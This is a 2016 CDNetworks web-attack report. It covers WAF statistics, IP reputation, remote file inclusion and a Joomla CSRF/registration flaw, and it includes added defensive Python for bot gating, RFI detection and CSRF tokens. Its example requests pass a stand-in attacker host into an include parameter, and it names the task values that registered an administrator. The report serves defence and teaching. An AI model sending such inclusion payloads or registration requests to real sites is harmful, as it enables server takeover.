CDNetworks Q4 2016 Web Attack Analysis Report


Security Level: Public
CDNetworks Q4 2016 Web Attack Analysis Report
2017. 2. (February 2017), CDNetworks Security Service Team

Table of Contents
Introduction
Web Attack Analysis
  Part I. Web Hacking Statistics
  Part II. Web Hacking Cases
  Part III. Technical Analysis Data
Conclusion

Public | Copyright (c) CDNetworks. All Rights Reserved.

Introduction

CDNetworks provides a web attack blocking service by placing a Web Application Firewall (WAF) in front of customers' web applications. This report shares the analysis of the web hacking types identified through CDNetworks' WAF during the fourth quarter of 2016, so that customers can operate their web applications more safely.

Web Attack Analysis

Part I. Web Hacking Statistics

1. Language-specific

We observed attack signs against PHP (84%), JAVA (3%) and other languages such as Python (13%). The PHP share is attributed primarily to the public disclosure of vulnerabilities in PHP-based CMS platforms (WordPress, Joomla, etc.) and the attacks that follow such disclosures.

<Fig. 1> Web attacks by language (PHP 84%, JAVA 3%, other 13%)

2. Vulnerability Type-specific

SQL Injection, CSRF (Cross-Site Request Forgery) and XSS (Cross-Site Scripting) account for most of the attack attempts.

<Fig. 2> Web attacks by vulnerability type (shares as listed in Table 1)

<Table 1> Vulnerability type

Secure Coding (CWE)    OWASP Top 10    Type                        Share
CWE-89                 A1              SQL Injection               26%
CWE-94                 A1              Remote Code Execution       5%
CWE-592                A2, A7          Authentication bypass       6%
CWE-269                A2, A7          Privilege escalation        3%
CWE-79                 A3              XSS                         13%
CWE-98                 A4              Local File Inclusion        3%
CWE-352                A5              CSRF                        28%
-                      -               Multiple vulnerabilities    10%
CWE-434, 23, 530       A4, A6          etc.                        6%

Vulnerabilities in the "etc." category include those related to file uploads/downloads (CWE-434, CWE-23) and exposure of backup files (CWE-530). Note that the OWASP column does not follow a single edition of the Top 10: in the 2013 list, which Table 2 below uses, CSRF is A8 rather than A5.

Part II. Web Hacking Cases

1. Web Scraping

Web scraping extracts data from websites with an automated tool; web vulnerability scanners rely on the same automation, and that is what the two figures below compare. The first figure shows a site without a WAF: the scanner's probes reach the application and its report lists the site's vulnerabilities.

<Fig. 3> The vulnerability results using a web vulnerability analysis tool - 1

The second figure shows the same scan with the WAF in place: most of the attack attempts are blocked. Whether an automated tool is allowed through or rejected is decided from three signals: access frequency (rate limit), whether the client returns the cookie the WAF set on an earlier response (Set-Cookie header), and whether it returns the page value that only a JavaScript-executing browser would have computed.

<Fig. 4> The vulnerability results using a web vulnerability analysis tool - 2
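The three signals above can be combined into a single gating decision per request. The following Python is an added example and not CDNetworks code: the key, the "more than 5 requests per 10 seconds" threshold, the cookie format, the toy JavaScript challenge and the sample traffic are all assumptions chosen for illustration.

```python
import hashlib
import hmac
from collections import defaultdict, deque
from typing import Optional

# Assumptions for the example (not CDNetworks settings): a per-deployment key,
# and "more than 5 requests from one IP within 10 seconds" as the bot threshold.
SECRET = b"edge-secret-for-demo"
RATE_LIMIT = 5
WINDOW_SECONDS = 10.0


def make_cookie(ip: str, issued: int) -> str:
    """Cookie the edge sets on first contact: timestamp plus an HMAC tag
    bound to the client IP, so a tool cannot simply invent one."""
    tag = hmac.new(SECRET, f"{ip}|{issued}".encode(), hashlib.sha256).hexdigest()[:16]
    return f"{issued}.{tag}"


def js_answer(cookie: str) -> str:
    """Value the served JavaScript computes from the cookie and sends back;
    a client that never executes the script cannot produce it (toy challenge)."""
    return hashlib.sha256(b"js:" + cookie.encode()).hexdigest()[:16]


class BotGate:
    def __init__(self) -> None:
        self.hits = defaultdict(deque)  # ip -> request timestamps inside the window

    def _rate_exceeded(self, ip: str, now: float) -> bool:
        q = self.hits[ip]
        while q and now - q[0] > WINDOW_SECONDS:
            q.popleft()
        q.append(now)
        return len(q) > RATE_LIMIT

    def _cookie_valid(self, ip: str, cookie: Optional[str]) -> bool:
        if not cookie or "." not in cookie:
            return False
        issued, _ = cookie.split(".", 1)
        if not issued.isdigit():
            return False
        return hmac.compare_digest(make_cookie(ip, int(issued)), cookie)

    def decide(self, req: dict, now: float) -> str:
        """req: {"ip": ..., "cookie": ..., "js": ...}. Returns the action taken."""
        if self._rate_exceeded(req["ip"], now):
            return "block:rate"          # access-frequency check
        cookie = req.get("cookie")
        if not self._cookie_valid(req["ip"], cookie):
            return "challenge"           # first contact: Set-Cookie and serve the JS challenge
        if req.get("js") != js_answer(cookie):
            return "block:nojs"          # cookie replayed but the script never ran
        return "allow"


def run_demo() -> list:
    """Constructed traffic: one browser, one scraper that replays the cookie
    without running the script, and one scraper that just hammers the site."""
    gate = BotGate()
    out = []
    browser, tool = "203.0.113.10", "198.51.100.7"
    out.append(gate.decide({"ip": browser}, 100.0))                                    # challenge
    ck = make_cookie(browser, 100)
    out.append(gate.decide({"ip": browser, "cookie": ck, "js": js_answer(ck)}, 101.0))  # allow
    ck2 = make_cookie(tool, 100)
    out.append(gate.decide({"ip": tool, "cookie": ck2}, 101.5))                       # block:nojs
    for i in range(6):  # six requests in two seconds from a third address
        out.append(gate.decide({"ip": "192.0.2.44"}, 200.0 + i * 0.3))                # 5x challenge, then block:rate
    return out


if __name__ == "__main__":
    print(run_demo())
```

The order of the checks is deliberate: the rate limit is evaluated before any cookie work so that a flood costs the edge nothing more than a deque update, and the cookie is bound to the client IP so that a token harvested by one scraper node cannot be replayed by the rest of a botnet.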

2. IP reputation

IP reputation services block attacks by using a blacklist of IPs with a history of attacks, built from the database information shown below.

<Fig. 5> IP reputation

Any access attempt from a blacklisted IP is blocked by matching the client_ip field recorded by the WAF against the list.

<Fig. 6> WAF detection information

Whether a given IP appears on such lists can be checked simply by googling it.

<Fig. 7> Results of googling IP validation method.

The number of IPs used by Mirai, a botnet built from compromised IoT devices, is currently growing, but attempts from such IPs are detected and blocked through this rule. Scanner activity attributed to Mirai is tracked at http://data.netlab.360.com/mirai-scanner

<Fig. 8> Mirai activity trend

3. Remote File Inclusion

Remote file inclusion (RFI) is a technique in which a file-include parameter of the application is pointed at a page on a host the attacker controls, so that the application fetches and executes the attacker's code and the attacker gains control of the server. An attempt to pass a remote site in the file parameter, as in the example below, can be detected:

(Example) http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicious_page

In the following case, an attempt to pass a Russian domain in the _dc parameter of picturefill.min.js was detected and blocked.

<Fig. 9> WAF detection information

The included domain was then checked on a malicious file and URL analysis site (VirusTotal). None of the 68 anti-virus engines flagged it, so the event was judged not to be an actual attack. A clean VirusTotal result does not by itself prove a domain harmless, since a freshly registered attacker host may not yet appear in any engine's list, so such a lookup should be treated as one piece of triage evidence rather than a final verdict.

<Fig. 10> Result of VirusTotal lookup
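The IP reputation check of section 2 and the RFI parameter check of section 3 are the two cheapest rules a WAF evaluates on an inbound request, and they compose naturally. The Python below is an added example and not CDNetworks' rule set: the blocklist ranges, the list of remote and wrapper prefixes, the decision labels and the sample requests are constructed for illustration. It goes slightly beyond the report's single example by also catching percent-encoded and protocol-relative (//host) values, and by showing why an RFI hit is a triage signal rather than proof.

```python
import ipaddress
from urllib.parse import parse_qsl, urlsplit

# Constructed blocklist standing in for the IP reputation database; these are
# RFC 5737 documentation ranges, not real attacker addresses.
BLOCKLIST = [ipaddress.ip_network(n) for n in ("198.51.100.0/24", "192.0.2.77/32")]

# Prefixes that turn an include parameter into a remote (or PHP wrapper) include.
# Assumed for the example; a production rule set is considerably longer.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "//", "php://", "data:", "expect://")


def ip_blocked(client_ip: str) -> bool:
    """IP reputation: true if client_ip falls inside any blocklisted network."""
    try:
        ip = ipaddress.ip_address(client_ip)
    except ValueError:
        return True  # unparsable client_ip field: fail closed
    return any(ip in net for net in BLOCKLIST)


def rfi_params(url: str) -> list:
    """Return (name, value) pairs whose value points at a remote location.
    parse_qsl percent-decodes, so %68ttp:// is seen as http://."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if value.strip().lower().startswith(REMOTE_PREFIXES):
            hits.append((name, value))
    return hits


def inspect(client_ip: str, url: str) -> str:
    """Reputation first (cheap, no parsing), then parameter inspection."""
    if ip_blocked(client_ip):
        return "block:ip-reputation"
    hits = rfi_params(url)
    if hits:
        # A hit is a signal for triage, not proof: the _dc case in the report
        # was benign on closer inspection. Record the parameter name for the analyst.
        return "block:rfi:" + ",".join(name for name, _ in hits)
    return "allow"


def run_demo() -> list:
    requests = [  # constructed traffic
        ("198.51.100.23", "http://shop.example/index.php?page=home"),
        ("203.0.113.5", "http://shop.example/vuln_page.php?file=http://attacker.example/malicious_page"),
        ("203.0.113.5", "http://shop.example/vuln_page.php?file=%68ttp%3A%2F%2Fattacker.example%2Fx"),
        ("203.0.113.5", "http://shop.example/vuln_page.php?file=about"),
        ("203.0.113.5", "http://shop.example/js/picturefill.min.js?_dc=//cdn.example.ru/picturefill.min.js"),
        ("not-an-ip", "http://shop.example/"),
    ]
    return [inspect(ip, url) for ip, url in requests]


if __name__ == "__main__":
    for line in run_demo():
        print(line)
```

The fifth request reproduces the shape of the report's false positive: a cache-busting parameter carrying a URL matches the RFI rule just as a real include would, which is why the decision label carries the parameter name, so the analyst doing the VirusTotal lookup knows what was flagged.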

Part III. Technical Analysis Data

Cross-Site Request Forgery (CSRF) is an attack that forces an end user of a web application to execute actions of the attacker's choosing by exploiting the site's vulnerabilities. It occurs primarily when the cookies (authentication information) that identify an individual user are not tied to the purpose and authority of each request, so that the attacker can perform certain tasks or forge data while bypassing authorization. For example, posting a message on a message board normally means (1) opening the board, (2) clicking "Write", (3) writing the message and (4) submitting it. If the submit step is accepted without a login, or without checking who initiated it, a large amount of spam can be posted to the board.

This section walks through the analysis of vulnerabilities found in Joomla (a CMS for authoring websites). Joomla versions before 3.6.4 (the fix shipped in 3.6.4 in October 2016, tracked as CVE-2016-8869 and CVE-2016-8870) allow an unauthenticated user to create an account or obtain administrator privileges arbitrarily.

<Table 2> OWASP TOP 10-A8
OWASP Top 10                                 Result       Remarks
A8 - Cross-Site Request Forgery (CSRF)       Vulnerable

<Table 3> CWE-352
Secure Coding (CWE)                          Result       Remarks
CWE-352: Cross-Site Request Forgery (CSRF)   Vulnerable

The vulnerability exists because a user can be added without authentication whenever register() in /com_users/controllers/user.php is called.

<Fig. 11> user.php vulnerability code

In the first attempt, setting the task parameter to registration.register adds an arbitrary user.

<Fig. 12> user.php exploitation - 1

In the second attempt, setting the task parameter to user.register registers an administrator.

<Fig. 13> user.php exploitation - 2

As shown below, a malicious user has been added.

<Fig. 14> Addition of an unauthorized user

Such an attack does not follow the application's intended flow but an abnormal path the application never meant to expose. Attacks of this kind are not detected by black-box tools (web scanners, etc.) or by white-box source code analysis; a consultant finds them by directly attacking the related module. How, then, are such vulnerabilities removed? The Secure Coding Guide distributed in Korea recommends changing the GET method to the POST method.

Source: JAVA Secure Coding Guide for e-gov Software Developers

<Fig. 15> Incorrect example regarding CSRF safe code

That example is incorrect: a cross-site page can submit a POST form automatically with the victim's cookies attached, and a POST body is as easy to forge with a proxy tool as a GET parameter, so changing the method alone does not stop CSRF. Instead, each security-critical page should carry an unpredictable, randomly generated token bound to the user's session, and the server should validate that token on every state-changing request. The example below shows the secure coding method using the open CSRF filter class.

<Fig. 16> CSRF filter
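To make the difference concrete, the following Python is an added example (not the report's code, not Joomla's, and not the e-gov filter class) that models a message-board "post" handler two ways: the rejected "accept POST only" advice, and a filter that requires a secure-random token issued per session and re-validated on the server. The session store, handler names, request dictionaries and the forged cross-site request are constructed for illustration.

```python
import hmac
import secrets

SESSIONS = {}  # session id -> {"user": name, "csrf": token}; stand-in for a session store


def login(user: str) -> str:
    """Create a session and, with it, a secure-random token the page will embed."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_hex(32)}
    return sid


def render_form(sid: str) -> str:
    """The legitimate 'Write' page puts the session's token in a hidden field."""
    return SESSIONS[sid]["csrf"]


def post_message_method_only(req: dict, board: list) -> bool:
    """The rejected advice: reject GET, accept POST, nothing else. An attacker's
    page can auto-submit a POST form and the browser attaches the victim's cookie."""
    sess = SESSIONS.get(req.get("cookie"))
    if req["method"] != "POST" or sess is None:
        return False
    board.append((sess["user"], req["body"]["text"]))
    return True


def csrf_filter(req: dict) -> bool:
    """Filter in the spirit of the open CSRF filter class: safe methods pass,
    every state-changing request must carry the session's own token."""
    if req["method"] in ("GET", "HEAD", "OPTIONS"):
        return True
    sess = SESSIONS.get(req.get("cookie"))
    if sess is None:
        return False
    supplied = req.get("body", {}).get("csrf_token", "")
    return hmac.compare_digest(supplied, sess["csrf"])  # constant-time comparison


def post_message_with_token(req: dict, board: list) -> bool:
    """Same handler behind the filter: cookie alone is no longer enough."""
    sess = SESSIONS.get(req.get("cookie"))
    if req["method"] != "POST" or sess is None or not csrf_filter(req):
        return False
    board.append((sess["user"], req["body"]["text"]))
    return True


def run_demo() -> tuple:
    board = []
    victim = login("alice")
    legit = {"method": "POST", "cookie": victim,
             "body": {"text": "hello", "csrf_token": render_form(victim)}}
    # Forged cross-site POST: the browser sends alice's cookie, but the attacker's
    # page runs in another origin and cannot read her token, so it can only guess.
    forged = {"method": "POST", "cookie": victim,
              "body": {"text": "BUY PILLS", "csrf_token": "0" * 64}}
    results = {
        "method_only_forged": post_message_method_only(forged, board),  # True: the spam lands
        "token_legit": post_message_with_token(legit, board),           # True
        "token_forged": post_message_with_token(forged, board),         # False
    }
    return results, board


if __name__ == "__main__":
    print(run_demo())
```

The token is a random value, not an encrypted one: its only property is that a page in another origin cannot read it, which is exactly what the method switch in Fig. 15 fails to provide. The comparison uses hmac.compare_digest so that token validation does not leak timing information.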

With the filter in place, the server re-validates the <secure-random> value delivered to the page, so forged requests are identified and blocked.

<Fig. 17> CSRF exploitation and protection cases

Conclusion

We have explored the web attack types seen in Q4 2016 and the exploitation of Joomla applications, and found that attack attempts against customers are continuous. Because information is being collected by automated bots and security incidents involving DDoS attacks such as GET flooding continue, suitable security measures are essential. CDNetworks' Cloud Security Service, a cloud-based web application firewall, provides multi-tier protection that blocks DDoS, automated bot access, and attacks on web vulnerabilities.

About CDNetworks

CDNetworks is a global content delivery network (CDN) with fully integrated Cloud Security DDoS protection and web application firewall. Our mission is to transform the Internet into a secure, reliable, scalable, and high-performing Application Delivery Network. CDNetworks accelerates more than 40,000 websites and cloud services over a network of 200 global PoPs in established and emerging markets including China and Russia. We have been serving enterprise customers for 16 years across industries such as gaming, finance, ecommerce, high tech, manufacturing, and media. CDNetworks offices are located in the U.S., UK, South Korea, China, Japan, and Singapore. For more information, please visit: https://www.cdnetworks.com.sg

Copyright Statement

Copyright CDNetworks. All Rights Reserved. Copyright in this document is owned by CDNetworks, and you may not reproduce or distribute this document without the prior permission of CDNetworks. Information in this document is subject to change without notice.

Global Offices

Singapore: 51 Cuppage Road, #06-07, Singapore 229469, +65 6908 1198
US: 1919 S. Bascom Avenue, Ste. 600, Campbell, CA 95008-2220, +1 408 228 3700
EMEA: 85 Gresham Street, London EC2V 7NQ, +44 203 657 2727
Korea: 2F, 37, Teheran-ro 8-gil, Gangnam-Gu, Seoul (06239), +82 2 3441 0400
Japan: Nittochi Nishi-shinjuku Building, 8th Floor, 6-10-1 Nishishinjuku, Shinjuku-ku, Tokyo 160-0023, +81 3 5909 3369
China: F15-05 Tower B, Greenland Center, Science and Technology Business Area, Wangjing, Chaoyang District, Beijing, 100102, +86 10 8441 7749